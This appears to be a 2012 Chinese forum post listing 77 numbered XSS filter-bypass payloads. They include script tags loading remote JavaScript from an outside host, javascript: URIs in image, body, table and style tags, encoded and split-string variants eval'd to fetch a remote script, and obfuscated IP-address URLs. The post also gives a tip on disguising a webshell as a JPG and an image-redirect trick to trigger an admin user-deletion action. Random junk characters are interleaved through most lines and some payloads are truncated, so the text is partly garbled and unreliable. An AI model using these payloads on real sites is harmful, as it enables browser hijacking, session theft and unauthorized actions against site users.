跨站图片shell+ b! v1 J; H1 ]- H
XSS跨站代码 <script>alert("")</script>3 Q( v- w1 i8 Y& j
& ?7 t! [9 F- f; e, ]3 E- L将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马* j- S$ C5 R, x7 t/ P P' g2 Y# d1 C2 p
4 o* K. O5 f; I/ E
L- k: y, f* T0 C" v! w
; U( @1 _. v# I3 {# v1)普通的XSS JavaScript注入* t$ k) X! u4 l* P: N" m
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>: N X" h" K0 U e9 {4 @. R& }! Z
) z$ P3 e* j# m! H1 T
(2)IMG标签XSS使用JavaScript命令. N" n& T1 y! e: c }+ Y3 A/ n' y
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
' X: n2 }1 X4 x. T: V- }: V+ l9 y# k9 e/ r* b. ~. e" p
(3)IMG标签无分号无引号
6 o) F5 R3 I* ^/ u6 V; ~<IMG SRC=javascript:alert(‘XSS’)>
5 d. B. ~3 z) U E4 l9 F0 w1 Q
7 ]" _ E0 N& f* i& u- d(4)IMG标签大小写不敏感
+ m5 N. t9 Q2 _0 F* z7 Y<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
& C5 @- B; l3 X N( c9 k% K
% H; I5 L7 H$ \" E* ](5)HTML编码(必须有分号)
- l* s7 c# z1 g6 |<IMG SRC=javascript:alert(“XSS”)>
+ T0 e! z# e5 i+ P, ]; n0 g( m G7 n9 l
(6)修正缺陷IMG标签
2 J+ H1 _8 p1 ^: n3 E+ m% F<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
/ Q( p' F% _0 S) V ^3 B9 B& G* T4 Y/ F7 T
(7)formCharCode标签(计算器)
+ v( ~" |. c8 q- T u* y* `4 g<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>, \& b+ `1 K6 L8 K- O) g0 G( W
% S! e7 N6 |# w( ?( V# E7 t3 b(8)UTF-8的Unicode编码(计算器)% g0 M8 S' d, P+ L9 x [% d
<IMG SRC=jav..省略..S')>5 ~% Y! E0 }0 x& M5 X* B/ C
4 B9 g( J) }% z5 t( f
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
4 z* ?! m) D. B: e/ ?) ~<IMG SRC=jav..省略..S')>" X4 a" R5 _% f7 ]
/ X! e9 x3 {7 m J8 b: k/ G$ ?' B
(10)十六进制编码也是没有分号(计算器)
0 o+ r( N) |4 ]! }7 B# P7 J<IMG SRC=java..省略..XSS')>7 i2 q; F2 ]' A9 v/ Z% S
3 V% I% G- X2 m9 E7 L(11)嵌入式标签,将Javascript分开
: w. }2 c% @: {+ L; A& p( B<IMG SRC=”jav ascript:alert(‘XSS’);”>
) ?- O+ ~1 b( j/ [% w" n6 S" O1 l" L/ P5 p3 i) L
(12)嵌入式编码标签,将Javascript分开
1 [ s# b* }0 ^+ P<IMG SRC=”jav ascript:alert(‘XSS’);”>/ ~/ z( `/ ]6 i+ ?5 q: u5 ~) N" w
+ c3 E9 {: V) n( W5 R- |1 b
(13)嵌入式换行符
) ~. z E% Q8 I! o<IMG SRC=”jav ascript:alert(‘XSS’);”>
% @5 I% k* r6 m& U/ _ R& c6 W0 n3 u( e. D$ t( K5 l) J
(14)嵌入式回车
* t R. G, f9 D<IMG SRC=”jav ascript:alert(‘XSS’);”>* E" S) c9 o/ ^5 j# f
$ n ^% n# E) l q/ d" k6 R(15)嵌入式多行注入JavaScript,这是XSS极端的例子
{! y$ h+ Q9 a<IMG SRC=”javascript:alert(‘XSS‘)”>
" |# A( u d, V0 L! {, R9 V( Y5 s8 x3 t, n1 h; m
(16)解决限制字符(要求同页面)' x; Z U; ]! L1 g* v% W; z
<script>z=’document.’</script>
& G" ` w/ p1 m1 I) y0 i6 F# M- e<script>z=z+’write(“‘</script>/ p5 U f! S& t) D {# k5 U, S
<script>z=z+’<script’</script>
4 a9 S) l/ J6 ]6 U) \<script>z=z+’ src=ht’</script>
: a2 [4 E2 M/ T<script>z=z+’tp://ww’</script>
' d5 Z% r! r4 L. |$ r1 W<script>z=z+’w.shell’</script>
' K1 `6 Z2 z4 b! U& H9 r# z8 K<script>z=z+’.net/1.’</script>
2 [0 y4 t$ v, Z1 z( U% [<script>z=z+’js></sc’</script>
3 x1 A% d# H% F4 E<script>z=z+’ript>”)’</script>& C8 Z1 U8 J; v5 W8 u
<script>eval_r(z)</script>+ m, {" N j$ y+ T) @( {
6 i" ?4 T* u E(17)空字符
% d0 U6 ^: L9 ?- s6 X! C, {perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out! m U8 d, s+ b/ n- z8 _3 [
; \, K9 k; }8 d/ `. b7 R# r4 W(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
, R; [! j- r9 w) r: P% Lperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
$ R$ g, z: x, z, W; f7 v( O) S* n, }7 y$ W- H% }$ q
(19)Spaces和meta前的IMG标签$ {& [9 l4 c# g$ O# e
<IMG SRC=” javascript:alert(‘XSS’);”>2 _6 ?; _5 ] Z1 f! R6 B* y$ B
; o, D6 T9 z9 L8 y0 \6 W9 {(20)Non-alpha-non-digit XSS6 j6 D6 Y0 p3 v! P
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
5 w+ c1 r% D/ t- a1 z3 v" N
6 K5 k3 S+ J+ N, v, k) g( ~(21)Non-alpha-non-digit XSS to 2
+ V3 {# g/ u; ~* V$ G# N<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>2 r/ p; E! S" ~5 u
; V: l- F* @% o, L; D9 A# Q/ R(22)Non-alpha-non-digit XSS to 32 p0 y8 m- f( e5 m0 X
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>1 p, A0 N8 b4 I7 l4 r
3 b0 s, E2 r$ l% C1 w. H(23)双开括号
. i. w/ t' H8 x2 t5 `, S% T# `# t<<SCRIPT>alert(“XSS”);//<</SCRIPT>
1 l8 l+ J) A9 k$ P' U
* W4 f# {4 l( `(24)无结束脚本标记(仅火狐等浏览器)
( W0 R q; T3 i<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
' Q2 e2 R. x Q/ w8 S5 s4 l# k
# }2 r! u, a! o- E- X(25)无结束脚本标记2: a" h$ e, {/ j7 D2 x/ N
<SCRIPT SRC=//3w.org/XSS/xss.js>
4 G% u2 f/ l8 L9 G) z* A7 _1 q0 M
& o6 B7 I8 o. r8 z' x# R(26)半开的HTML/JavaScript XSS% W- a) }+ [# d! h7 }4 [2 b
<IMG SRC=”javascript:alert(‘XSS’)”
' {) G( ]& ?/ m) f
* z0 ]6 d* \: G9 F( B; t3 J(27)双开角括号6 ^9 [! T" I5 d* \% q
<iframe src=http://3w.org/XSS.html <
# g. c$ w3 K+ P$ b
5 D- _7 a* }" _, y# j1 {. }* M(28)无单引号 双引号 分号
6 z d" ]( \, T$ T4 f<SCRIPT>a=/XSS/
8 r$ _+ U o3 c6 _" u+ C" N9 ]alert(a.source)</SCRIPT>
2 E0 ^- _" g0 t
7 y! h8 Y% d- g7 t(29)换码过滤的JavaScript/ \/ w$ t, J$ J
\”;alert(‘XSS’);//9 _* F* q4 L8 i- v- o( ~$ I' K; i
. F' ^! Y. b; Y% r& ^(30)结束Title标签* \; ]5 } e. t
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
( S+ F) Y" C3 i4 e- S' `
- k- c% x& N$ j x3 J, r(31)Input Image
; |5 c$ I) x* f, u9 @<INPUT SRC=”javascript:alert(‘XSS’);”>6 p' u; g+ L! E' B( `/ [4 R8 o
4 i2 A0 J0 P2 n6 ~, q$ e( [: K" C' U(32)BODY Image! _5 G+ g7 Y0 y3 Z: K" k5 G7 L
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
! i, g2 [+ b4 ]; n5 x6 {3 n7 y( p. b1 I
(33)BODY标签
+ c7 H1 m+ A K& R<BODY(‘XSS’)>
% `. J! q* r* D _, R, v' i$ C, p2 ]. f# C) D, y
(34)IMG Dynsrc. r( r d- N% Z0 G& g
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
/ _, p' {1 s$ U' Q
8 y+ I! j: z- l(35)IMG Lowsrc
; ^0 ?0 h I5 l9 O2 h, M, i: {<IMG LOWSRC=”javascript:alert(‘XSS’)”>
' s5 m8 Z0 s' A- `) e9 l5 k0 {" O( O+ M9 a! p
(36)BGSOUND. o2 {* e9 u1 R, j% u" _/ \; f* Y
<BGSOUND SRC=”javascript:alert(‘XSS’);”>* W6 v' G. Z- I4 E% _( ` a! x( E4 B
$ a: ?# _- J* W5 Q7 U(37)STYLE sheet
# \/ a* U: _, u8 t9 I1 n9 `# K$ f<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>9 f6 }2 I0 e- \' |
# R2 K' o/ N N G- g3 Q, \
(38)远程样式表- F% E3 H8 N: h0 J$ [# C! \0 P7 X
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
. U% J. A0 s' I& l6 S7 r% F" Q
7 v1 O# m: T- f# l: K$ t0 Q1 [(39)List-style-image(列表式)
! z+ E8 S- Y; ~+ w% B<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
. b. h% f J+ f% E0 N: m6 e5 N/ d1 p2 S+ W1 \ [6 d5 Y& y
(40)IMG VBscript* U% k" l. n* b9 s: t+ d
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS! O. w) x: y5 }3 T/ L3 X" g
4 ]- p5 _2 S( m/ [(41)META链接url: M5 u) j; W1 N7 M) w9 ]3 b7 T
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>* O c! l& g9 ~
* o) m) }0 y9 h& r. M. g' q(42)Iframe
+ ]$ t- F0 G* s<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
$ |1 S0 E1 S6 l/ y% W; e(43)Frame6 j8 F4 b# \/ Z+ I( m
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
" |0 g- C% R @9 v$ ^. A" _" i$ j1 E3 M
4 V5 }) q# G$ U5 Y J(44)Table
, f* |& Y# o. O& P<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>. o* R0 V, P+ o4 I! m
2 m6 z4 F3 o- _4 K1 K7 q) I2 r( Z(45)TD2 x! f* v) r$ @$ P2 k" g- k d! z
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>* j% k; _) [& ~8 [) _# ]
4 ^( L' s/ [; b7 S# x5 }(46)DIV background-image/ T0 l% H# D, C; Y5 N# `5 r8 S
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
8 T2 X& g! D& A. H5 B0 Z# T
" j( k& o9 X% k0 F( G0 T: Z(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
9 I: h; Q' K, d! g( X( E<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>8 O& I/ N* s. X1 U( p
7 O2 }: S9 H* r6 `) O(48)DIV expression2 Q6 I/ s, X' b+ \- R# E
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
& d% z, S$ L' N1 z' S2 G* K- A4 L/ m9 q, [
(49)STYLE属性分拆表达% }( I! {! g5 J/ ?
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>1 I4 d. w- U; Z; e2 I- T: L$ g8 }6 K; s
8 ]; S+ Q' q7 S
(50)匿名STYLE(组成:开角号和一个字母开头)' z( _) x; n$ e# T' T1 h. g
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
* g6 v4 o1 P$ L. X& F7 b+ c; `6 h
(51)STYLE background-image
- G O# t! e, F' }( {" _. b<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
1 `& u3 b* ~; y' c; A
# `8 ^5 `/ f& I& S, b" c( t(52)IMG STYLE方式: g; D9 `8 R2 b! H- M1 {6 f+ i$ e
exppression(alert(“XSS”))’>) z) K: b% c6 N, k6 j
% d- f& e7 b/ \" u(53)STYLE background
, ?1 W! d+ g2 ~3 I$ |2 `% c2 M<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>: ?% q) h3 F' s& A- k
8 u7 J# }+ S2 \0 c
(54)BASE
! V* D& s1 w. {% k<BASE HREF=”javascript:alert(‘XSS’);//”>: f/ [. Z2 Z+ i1 G% ?+ `4 T& ]
- x. G4 B2 R$ Z2 y4 C
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
8 }% s- _) X7 k+ d<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
1 b! n& O* Y3 n# Q8 h0 Q% [7 y2 E
$ F! t8 `" i* d- D2 ^(56)在flash中使用ActionScrpt可以混进你XSS的代码
' o9 B- T* g. Z7 ca=”get”;
) h8 t: j8 L2 E1 J+ v0 b8 j% Q, kb=”URL(\”";
* Y2 q5 k$ N, q. @9 c: xc=”javascript:”;
( t9 I6 v6 K8 cd=”alert(‘XSS’);\”)”;( ~6 O" A3 ~# T
eval_r(a+b+c+d);9 v* H. w2 u6 r. I# V( }
t& ~2 ]3 g1 O: E/ ^
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
/ x6 ~: {- r! o: L7 a5 [/ J<HTML xmlns:xss>1 m' y% W4 L2 ^7 [
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
6 o7 k+ w+ s9 v" E" k- U) p0 u<xss:xss>XSS</xss:xss>4 ?4 }% C6 e1 p- e( b) ?; ?4 P0 y% U# w
</HTML>( G' u1 a2 D5 }/ q# j" ^
1 U1 F: O; g1 L& k( D
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用5 s8 x0 A( T" K$ W" h
<SCRIPT SRC=””></SCRIPT>; B5 y; L! L$ m2 p K3 f' t) a
* o) W6 M( ]" V: a$ O/ [(59)IMG嵌入式命令,可执行任意命令
" Q9 d. ^" @ X" W8 E<IMG SRC=”http://www.XXX.com/a.php?a=b”>/ r4 M! x( C9 @( d/ @
% t1 P! g: T+ ^; _9 @/ r9 S$ F- t* ^(60)IMG嵌入式命令(a.jpg在同服务器)+ K9 z3 I* t% f; M
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser: D# n% {" o- F
1 x! e. _- D$ C% v$ ?: a! T) j(61)绕符号过滤9 F, N: s ]- J& i. Y4 _4 D
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
) B, \7 y$ }! `! X
: l( B4 E% O) n, Z; [4 w# R(62)
O" M& U+ U% d& o: R" O* \( }+ Q8 y<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
, G& N* Q& X9 v ?1 X$ N
: F5 u1 Q# ]6 w8 E) p(63)
, F- \/ f7 {/ N1 X/ c: y<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
1 X, m" U0 _0 N
7 U% C3 i+ X- n2 j, K+ O/ B1 Z(64)
1 ^) z- T4 q; r! S<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
, D: t! h+ t2 q, \' C! ?4 p" p# a$ T; R6 j7 R; }0 [ x
(65)+ U: J$ `8 X% r! g
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>: R9 L5 h! H1 c! Z/ W
0 @- b6 Z* n& G* ^(66)3 r4 g3 d. z# n# q! Q- C# A7 i$ v
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>' `1 }3 P' g' b/ c$ ` d; w$ e/ N9 L
$ f% ?, t5 {6 E" T7 V: \(67)- Y' Q* l+ g4 |! P, N) b
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
; w/ B0 Q+ b% e) Y( e6 z9 f. M! u$ y s" X6 U" Y
(68)URL绕行% X7 O! v# h' u# \6 J0 j1 a) n- [
<A HREF=”http://127.0.0.1/”>XSS</A>
! y" @3 Q: c/ b! B1 l- W
+ ?2 Q* j8 R: c3 f8 Y# a$ V(69)URL编码
* G& Z2 K2 W, i L0 c<A HREF=”http://3w.org”>XSS</A>
3 {3 V1 \; Z/ A2 v: }5 g, n! v# g u( O$ t. c
(70)IP十进制 E3 w* U& p1 m+ C2 k1 k- B
<A HREF=”http://3232235521″>XSS</A>$ ?9 V' B- P+ c6 C5 h6 r& X* R
# ?) r' H4 m, {) P# C0 E$ I
(71)IP十六进制. ~8 a( d# @& _7 f9 y# X- l
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
8 S6 W: D- e. K" e. u- c3 i3 r7 b- b) @7 ~; C
(72)IP八进制
9 u( u& h/ b2 j9 d4 F. F<A HREF=”http://0300.0250.0000.0001″>XSS</A>1 O' _' E( T. q- l( g
- c ~9 z% O" D/ Q c
(73)混合编码+ M p, S1 J% |
<A HREF=”h* E' i! r& u* {( B
tt p://6 6.000146.0×7.147/”">XSS</A>3 z2 c$ H4 x/ z |! C
7 `4 h# ]0 [/ r" c/ X: [/ U$ @(74)节省[http:]
4 \' m& C b5 t) q<A HREF=”//www.google.com/”>XSS</A>
' t" ]5 R- u1 B- q s7 I+ N
2 p0 a$ y. Y; w+ b# Z(75)节省[www]1 P: c, U( I6 i7 E/ l
<A HREF=”http://google.com/”>XSS</A>
+ N, z5 a. I5 `! J7 [% h% h+ ]4 J# Z G
(76)绝对点绝对DNS
7 Q8 w Q9 ?# e% F8 F& g! G$ l<A HREF=”http://www.google.com./”>XSS</A>
: N' u4 I* q2 \9 f; k# H
$ Q: q& I& c5 i+ W(77)javascript链接& F9 w8 f) ^, b7 O8 D) H
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
1 V& k. v& c |$ I, y |
发表于 2012-9-13 17:04:56
收藏
支持
反对